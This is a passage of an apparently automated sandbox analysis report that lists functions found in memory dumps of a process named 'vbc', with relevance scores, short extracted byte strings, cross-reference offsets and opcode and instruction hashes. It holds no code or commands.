Opcode Fuzzy Hash: 091e5857396c22416ab6d338d692a67fa3623cbc75bdca86af1b308681e3099f
Instruction Fuzzy Hash: B181C974E00219DFDB54DFA9D984A9DBBF2BF88300F64C06AE419AB365DB345941CF50

Function 0642C980 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0642CBDA
Lj@p, xrefs: 0642CB62
PH]q, xrefs: 0642CBEB
0o@p, xrefs: 0642C9F5
Lj@p, xrefs: 0642CB78

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: a69c37d64c592218673e320e9662008a799c0b8856b06cb96924215005ed4463
Instruction ID: ff8334736ee56b8558c5f27d9ec5448811a73fd719287e1ba4f7cb0793bfc15d
Opcode Fuzzy Hash: a69c37d64c592218673e320e9662008a799c0b8856b06cb96924215005ed4463
Instruction Fuzzy Hash: 6B81D774E00219DFDB54DFA9D984A9DBBF2BF88310F64C06AE409AB365DB349941CF50

Function 0642D4EA Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

Lj@p, xrefs: 0642D6D8
PH]q, xrefs: 0642D74B
0o@p, xrefs: 0642D555
PH]q, xrefs: 0642D73A
Lj@p, xrefs: 0642D6C2

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: a2f7849587ae44eb208e71f8fad826d9dde0b421e032b5af5a4e569f4581917f
Instruction ID: aa8a56a3fa9109a48d4aed66df0240e072cf960d47947acb1073bd7343a8bbe3
Opcode Fuzzy Hash: a2f7849587ae44eb208e71f8fad826d9dde0b421e032b5af5a4e569f4581917f
Instruction Fuzzy Hash: A181D774E00219CFDB58DFA9D994A9DBBF2BF88300F64D06AE409AB365DB349941CF50

Function 0642D216 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

Lj@p, xrefs: 0642D400
0o@p, xrefs: 0642D27D
Lj@p, xrefs: 0642D3EA
PH]q, xrefs: 0642D473
PH]q, xrefs: 0642D462

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
API String ID: 0-1229222154
Opcode ID: f162d81d27578d3db02f1f5aaba504570f659162c02fca6b27bddc321e369cf8
Instruction ID: 2ad6de968f3c917615406cd69fe3ad86e13d4acea82aa93f56c552d1f6b070d6
Opcode Fuzzy Hash: f162d81d27578d3db02f1f5aaba504570f659162c02fca6b27bddc321e369cf8
Instruction Fuzzy Hash: 5D81B774E00219DFDB58DFA9D984A9DBBF2BF88300F64C06AE419AB365DB349941CF50

Function 0642C6A8 Relevance: 3.9, Strings: 3, Instructions: 153COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0642C913
0o@p, xrefs: 0642C71D
PH]q, xrefs: 0642C902

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 0o@p$PH]q$PH]q
API String ID: 0-2023588385
Opcode ID: 72a8022f868402ada8c7378f1386d5c6064185b1eaf10bcfd324a00e1e7ea281
Instruction ID: 350a93d4a3f1fcbd6b78e198dd1addb19c3e7cf31db1dadf8ae5bf6b15d5d5ae
Opcode Fuzzy Hash: 72a8022f868402ada8c7378f1386d5c6064185b1eaf10bcfd324a00e1e7ea281
Instruction Fuzzy Hash: A061E974E002199FDB58DFAAD984A9DFBF2BF88300F24D02AE419AB365DB345941CF50

Function 0642A598 Relevance: 3.4, Strings: 2, Instructions: 889COMMON

Download Yara Rule

Strings

4']q, xrefs: 0642B023
(o]q, xrefs: 0642AA28

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$4']q
API String ID: 0-176817397
Opcode ID: 09fd1251f5871c1a83bd05780ff2b8530cdc1a3ea19a3bca564537fffeeae076
Instruction ID: ff5fcde19d55b239d7fa248366cccfb99dafa8cc163fc99f8da00dbf4a1430d3
Opcode Fuzzy Hash: 09fd1251f5871c1a83bd05780ff2b8530cdc1a3ea19a3bca564537fffeeae076
Instruction Fuzzy Hash: 7D82A570A0021ADFCB55CF68C984AAEBBF2FF48310F658556E815DB3A1D734E981CB91

Function 06426EA8 Relevance: 3.0, Strings: 2, Instructions: 536COMMON

Download Yara Rule

Strings

Haq, xrefs: 064272BA
(o]q, xrefs: 064273EE

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$Haq
API String ID: 0-903699183
Opcode ID: a5fdeaacb20bbd1b955b654e965bc3b443ac2374368054227998e565b5d3d00f
Instruction ID: 3acd4cc8bddf1d296f840c3e5c83149e685a09b8d7a74875d7002236e2d48c82
Opcode Fuzzy Hash: a5fdeaacb20bbd1b955b654e965bc3b443ac2374368054227998e565b5d3d00f
Instruction Fuzzy Hash: DD129070A0022A9FCB55DF69C844AAEBBB6FF88300F64855AE545DB391DB349D42CB90

Function 0642EEE0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d018848f2913af787fcd585923a81bd82ec26ecf9c6e190dce357037fcabf407
Instruction ID: 59dc8125104a268316349108e52ba7208341a857eb693dcde3ace73ab6d07149
Opcode Fuzzy Hash: d018848f2913af787fcd585923a81bd82ec26ecf9c6e190dce357037fcabf407
Instruction Fuzzy Hash: 3B51E874E00208DFDB58DFAAD544A9EBBB6BF89300F60C02AE815AB365DB345846CF54

Function 0642EED2 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0649776617e99b0dbdb5223367f7376a509281155bd0949e069c8d365207f00
Instruction ID: 4afe25d45442dec431dff8b2647972b37dba77c6bfcc82680d9859aa59475c2d
Opcode Fuzzy Hash: c0649776617e99b0dbdb5223367f7376a509281155bd0949e069c8d365207f00
Instruction Fuzzy Hash: ED51D874E00218DFDB58CFAAD544A9EBBB2FF89300F60C02AE815AB365DB355846CF54

Function 06427C08 Relevance: 10.5, Strings: 8, Instructions: 486COMMON

Download Yara Rule

Strings

(o]q, xrefs: 06427D2D
(o]q, xrefs: 06427C46
,aq, xrefs: 064280A8
(o]q, xrefs: 06428127
(o]q, xrefs: 06428117
(o]q, xrefs: 06427D01
(o]q, xrefs: 06427DCA
,aq, xrefs: 064280B8

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: bd5321f4bf3e3a121bfd832da1c8a70f14939ae699b28fc54f8071d4f83e1527
Instruction ID: 3df076158da2b83c253f3dca3d26799c8399f67dcdc2e5be20e3a75fe579498e
Opcode Fuzzy Hash: bd5321f4bf3e3a121bfd832da1c8a70f14939ae699b28fc54f8071d4f83e1527
Instruction Fuzzy Hash: 4E129C30A0021A9FCB55CF68D984AAEBBF2FF49314F65859AE419DB3A1D730EC45CB50

Function 064289A8 Relevance: 3.2, Strings: 2, Instructions: 699COMMON

Download Yara Rule

Strings

$]q, xrefs: 064294EF
$]q, xrefs: 064294CC

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 78409c8eb664a2bcbd025739f757a577f21473c5d133395b8c06f516a2d122ce
Instruction ID: d2548eb7d1f6d93588ce6c383960d73e0791ba8551adfcc8d31e5793955d0d94
Opcode Fuzzy Hash: 78409c8eb664a2bcbd025739f757a577f21473c5d133395b8c06f516a2d122ce
Instruction Fuzzy Hash: 04524070A002198FEB95AFA4C960B9EBB77FF84300F6081ADD50A6B3A5CE355E45CF51

Function 06426448 Relevance: 2.8, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

Haq, xrefs: 06426533
Haq, xrefs: 06426566

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: Haq$Haq
API String ID: 0-4016896955
Opcode ID: 41a7ba65287d307bf79398ef250883c63d432ae775676ab17077f783178169eb
Instruction ID: 5071f194e2632643cd2a3b3d5599224b79eeeda5c562b4e8cc7a0178cfde4750
Opcode Fuzzy Hash: 41a7ba65287d307bf79398ef250883c63d432ae775676ab17077f783178169eb
Instruction Fuzzy Hash: 339102307042659FCB469F38D89477B7BA7BF88300F65456AE9468B396CF74C802C7A1

Function 064269A8 Relevance: 2.7, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

,aq, xrefs: 06426A7E
,aq, xrefs: 06426A88

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: ,aq$,aq
API String ID: 0-2990736959
Opcode ID: 43529e73ca943ed40d2209f407025bc9998f6cb3edeacdefb006084de320d71c
Instruction ID: 10cf5b5a6d3cbbbf1b33456d2e4349074095e961275a603d0863557fde030665
Opcode Fuzzy Hash: 43529e73ca943ed40d2209f407025bc9998f6cb3edeacdefb006084de320d71c
Instruction Fuzzy Hash: 7591A530B00136CFDB85DF69C88496ABBB6FF89711BA6816AE405DB365DB31D841CB90

Function 064295AF Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

4']q, xrefs: 064295C9
4']q, xrefs: 064295EF

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: 3ff70e612afaf08cf96ac94d22c18edc37e1edde32e86130c53e86d1fedc98db
Instruction ID: bf74169251e51220a500729480c59c31763ba2a8eb7ac1af0239d815f6714ce0
Opcode Fuzzy Hash: 3ff70e612afaf08cf96ac94d22c18edc37e1edde32e86130c53e86d1fedc98db
Instruction Fuzzy Hash: 6A1193317041239FEBAA1A6B88D4A7B36CE9F84A54F74046BE055CB354DE1ACC81C3E1

Function 06421190 Relevance: 1.8, Strings: 1, Instructions: 548COMMON

Download Yara Rule

Strings

LR]q, xrefs: 0642141F

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 446d5de00943290266f20ab1a987bdbc40b19821401bb1b82181edf15edc30fc
Instruction ID: 8382f42fba2d2aeef92e3c9561115fe00e3b0e11a72999583d2a05fea912148f
Opcode Fuzzy Hash: 446d5de00943290266f20ab1a987bdbc40b19821401bb1b82181edf15edc30fc
Instruction Fuzzy Hash: D452F774900219DFCB54DF78ED85A9DBBB6FB88300F1052A9E50AA7355DB385E86CF40

Function 064211A0 Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

LR]q, xrefs: 0642141F

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: 7132e850386f3dc5008be62a2354b61ed73aae08025ed517f6db8331c870f913
Instruction ID: 262fecb342745d6433d34981822554fdbb7e346006cb26b759336eb422a4d0f8
Opcode Fuzzy Hash: 7132e850386f3dc5008be62a2354b61ed73aae08025ed517f6db8331c870f913
Instruction Fuzzy Hash: 9752E774900219DFCB54DF78ED85A9DBBB6FB88300F1052A9E50AA7355DB385E86CF80

Function 0642B400 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0642B589

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: (o]q
API String ID: 0-794736227
Opcode ID: 703609eed10d4f5860190d7725ef8a0975b99a53ed6214218a36a1739cbe486a
Instruction ID: d9631ce21b7e954320e08ec095e3322de958a62dc5c40ecc07d2aed0e6972d61
Opcode Fuzzy Hash: 703609eed10d4f5860190d7725ef8a0975b99a53ed6214218a36a1739cbe486a
Instruction Fuzzy Hash: 574105317042189FCB159F79D854AAE7BA7EFC8710F14416AEA16EB391CE319C01CBA1

Function 06426C47 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

(o]q, xrefs: 06426CB3

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: (o]q
API String ID: 0-794736227
Opcode ID: a8005ea9a899edea00c24a29f2a2def2ce39ffdc313e45cb1c8ea3e6f08abe01
Instruction ID: a85baa00d2fe9220fc209e7f1d5dbc88e2f45de832e5dc6d55788779e263d854
Opcode Fuzzy Hash: a8005ea9a899edea00c24a29f2a2def2ce39ffdc313e45cb1c8ea3e6f08abe01
Instruction Fuzzy Hash: C41106307412164FCB49AFB5AE1097A3B9BEFC4610361067AD506C73A6EE78CD06C7B1

Function 0642E562 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc285fcaa7777146bb74c9ed7ecd5587b90948ec7ad419e0c4fde245be6270f
Instruction ID: d03cb94f9b12a5f37b6499c8f49317efd81e695d7bd496a9e86cb619be775d5e
Opcode Fuzzy Hash: 7bc285fcaa7777146bb74c9ed7ecd5587b90948ec7ad419e0c4fde245be6270f
Instruction Fuzzy Hash: 7C12CA38075B46DFDB806F32F2AC16A7A61FB4F3677017D28A61FC18069B70508A9E65

Function 0642E568 Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e82de090f4be7d7631ccb2c58752bfb031faa1fb1545b8b51b2b29705120165
Instruction ID: 430039170949a4e3a4910041259fffecd34f2642c46570ce1ae96c6c4f54cd2f
Opcode Fuzzy Hash: 7e82de090f4be7d7631ccb2c58752bfb031faa1fb1545b8b51b2b29705120165
Instruction Fuzzy Hash: 3912CA38075B46DFDB806F32F2AC16E7A61FB4F3677017D28A61FC18069B70508A9E65

Function 0642B5C8 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c759a5f12e9d3b3dd21eaad35d13d27199137367b20b2b22d950c1e8567e7a9d
Instruction ID: 43fafa869234af1a78ae2af7468ee9c4c5ad59ff309943988107660c503b070c
Opcode Fuzzy Hash: c759a5f12e9d3b3dd21eaad35d13d27199137367b20b2b22d950c1e8567e7a9d
Instruction Fuzzy Hash: FBF12F71E00625CFCB45CFA9D9849AEB7F6FF88314B69815AE515AB361CB30EC41CB50

Function 06420890 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b469b48db3a223f56097a468f758a9d2bde5c024df9a3f50c3dfa84288315cd0
Instruction ID: 70aa125c8abb4682aa0f6c9cd120b9cd22a291ca6cd925f419bbab4164428e3e
Opcode Fuzzy Hash: b469b48db3a223f56097a468f758a9d2bde5c024df9a3f50c3dfa84288315cd0
Instruction Fuzzy Hash: 7CB11A347405118FD794DF39C999A2A7BE2FF89B14B6581A9E50ACB3B1DB31EC01CB90

Function 06420881 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a584556e52bdc1d6517f66ef123a44856c4df8691d4d0e575b666d2a2bcb27
Instruction ID: 4502018f3894ea3a5477bc0cdcbc05d6c7d0ad62feab06fa9e6598104b1d719c
Opcode Fuzzy Hash: f3a584556e52bdc1d6517f66ef123a44856c4df8691d4d0e575b666d2a2bcb27
Instruction Fuzzy Hash: A8A118347405108FD794DF29C998E2A7BE6FF88B14B6185A9E50ACB771DB31EC01CB90

Function 064285F0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4166a5a155614f1afd06db285774a429a4929fa85c0ef3d0cc933a3a3e8308a1
Instruction ID: f6f35f02611e049d57e87adbd8414c4df1599baa89aa1fe23962b54fa978d04b
Opcode Fuzzy Hash: 4166a5a155614f1afd06db285774a429a4929fa85c0ef3d0cc933a3a3e8308a1
Instruction Fuzzy Hash: C0719F34B002568FCB55DF39C898A6E7BE6AF99340F6500AAE902CB371DB70DC45CB91

Function 0642DA90 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b38bc0397d70a3b4620a3454b92141bfedbc6a29bcf4a08b18ab27c0dc1e6009
Instruction ID: 16d6fe0ffed70e253ee807039adfe80a5530aca5978d776ec615d912c98ee7f4
Opcode Fuzzy Hash: b38bc0397d70a3b4620a3454b92141bfedbc6a29bcf4a08b18ab27c0dc1e6009
Instruction Fuzzy Hash: 2D519374E01218DFDB48DFAAD99499DBBF2BF89310F20816AE419AB365DB319901CF40

Function 064246A8 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f425778b13bbab0c0f5eeda5cec3c23589175e738192536dcfc5a1322cccca
Instruction ID: 93907b9f23f4bf82541a646c79d682df855e48c6ada1e3f73ed613ac695aa02b
Opcode Fuzzy Hash: a0f425778b13bbab0c0f5eeda5cec3c23589175e738192536dcfc5a1322cccca
Instruction Fuzzy Hash: D051CA74E01219CFCB58DFA9D88099DBBF2FF89310B209169E405AB364DB359942CF50

Function 0642A813 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fd91b59402f8cd504509a098b288ae2aa4adb4c025fd13d6af6f483cd11d10
Instruction ID: 97aa147eb0ffbe2501558df448314205f389565119c7fe6ab0f6d3442083097a
Opcode Fuzzy Hash: 91fd91b59402f8cd504509a098b288ae2aa4adb4c025fd13d6af6f483cd11d10
Instruction Fuzzy Hash: 3A41D331A0029ADFCF11CFA5C844A9EBBB2EF49310F558556ED05AB391D331D8A5CF90

Function 06425B68 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9955bcdda8370a4cb4d81499b8d5631483ac118f5a93a6e78902c47152174a8
Instruction ID: 44e3f1559e666a567260ceafe3c47fc5154fcc5b10abc51ae38af041b481a09a
Opcode Fuzzy Hash: a9955bcdda8370a4cb4d81499b8d5631483ac118f5a93a6e78902c47152174a8
Instruction Fuzzy Hash: BF31A53160411EAFCF85AF74D454A6F7BA7EF88700F60412AFA0687391DB75C912DBA0

Function 06428888 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb300ec788e1942b3b2d1d41f90e77eb9eda059ce44c3b638edc139269a5fc5
Instruction ID: 78854f550d2e5bce8b5a8365e1a5a145563c74870eed429990425117fc9c1e8f
Opcode Fuzzy Hash: bdb300ec788e1942b3b2d1d41f90e77eb9eda059ce44c3b638edc139269a5fc5
Instruction Fuzzy Hash: 3C212831B18227CFDBA61735885433E7697AFC5644BA8403BD506CB751EA25C81AD7C2

Function 0642B5B9 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5beb72b8a7233f88bd309ff851e9224107d7ab6f5c7cc81d6a022496efeab752
Instruction ID: 48096fae52ec44c0ea7e6f18116dcc4ba60ae33e039526b85e1dd3f19dff14fc
Opcode Fuzzy Hash: 5beb72b8a7233f88bd309ff851e9224107d7ab6f5c7cc81d6a022496efeab752
Instruction Fuzzy Hash: D0318671A0051A8FCB44DF69C8C8A9EBBF7FF84714B298156E5159B3A1C730DC41CB91

Function 06428898 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca36f3a8b418baf4ccfb84ed64c528085b5d518387a0d396e68404d78c0fe696
Instruction ID: 3537c04803e578c2f9284b2f3cebc8c6f2ffe449234194fad59ef48aa4a95979
Opcode Fuzzy Hash: ca36f3a8b418baf4ccfb84ed64c528085b5d518387a0d396e68404d78c0fe696
Instruction Fuzzy Hash: 6821D030704227CFEBA62739845473E7587AFC8644F68803AD546CB394EE2ACC56D782

Function 0642FC72 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb72636339a7a33547ff04cfb59c0465d5e421b20ebaf21967f04f7cc9d9a556
Instruction ID: 7b84fab24686835e371899e1e3acc501ab4df3d3589cdfd78766c780ecd8560e
Opcode Fuzzy Hash: bb72636339a7a33547ff04cfb59c0465d5e421b20ebaf21967f04f7cc9d9a556
Instruction Fuzzy Hash: DC21A670D4011ADFCB85DFA9E941A9EBBF5FF40700F908266D509AB311D7744A0ACBD0

Function 06422E08 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93a70e20cb83871e667d5ca4daf0c901ebdfd480303b34351057bbca82577c4
Instruction ID: 8ef49f0cb3b003f6f009e1fa1b20411ccc7708130f985b8e90a36a9d124db541
Opcode Fuzzy Hash: d93a70e20cb83871e667d5ca4daf0c901ebdfd480303b34351057bbca82577c4
Instruction Fuzzy Hash: 6321A135A001269FCB55CF74C8409AF77A5FB88254B60C11AE8098B340DB34EA47CBD2

Function 0068D39C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4511897619.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ce884b94bf2c9aee139939a7306414b8d841283c7923c6dae4ac1d6fd1c36f
Instruction ID: 4cdf31ad534e1670045e82a678bf6d5ce38c5c299f5cfbb4667545ce3a21ecb4
Opcode Fuzzy Hash: 18ce884b94bf2c9aee139939a7306414b8d841283c7923c6dae4ac1d6fd1c36f
Instruction Fuzzy Hash: 2E21D6B1504244DFCB05EF14D9C0B26BFA6FB88314F24C669D9090A396C33AE816DBB2

Function 06426810 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db40fd43e3649872e6ad5e22618149ac7a4e2b7b6d5199190af8e7d48b72f9f
Instruction ID: 0ab13f290751f301a6f22a528d8e61db5040aeb96f58f5c007769673984e3365
Opcode Fuzzy Hash: 0db40fd43e3649872e6ad5e22618149ac7a4e2b7b6d5199190af8e7d48b72f9f
Instruction Fuzzy Hash: 0D21F331B015229FC35A9A35C45492FB3A7EFCA755726422AD90ADB350CF30DC02C7D0

Function 0639D118 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512035577.000000000639D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0639D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_639d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c8cd564c21e41a2479e2f43a73cc43bac850f14f7c2a156a289ef5a0730d7b8
Instruction ID: cd6859e5fd1171600f88f0f913e957ab41fbc64605922ce8bd548cb0882000c9
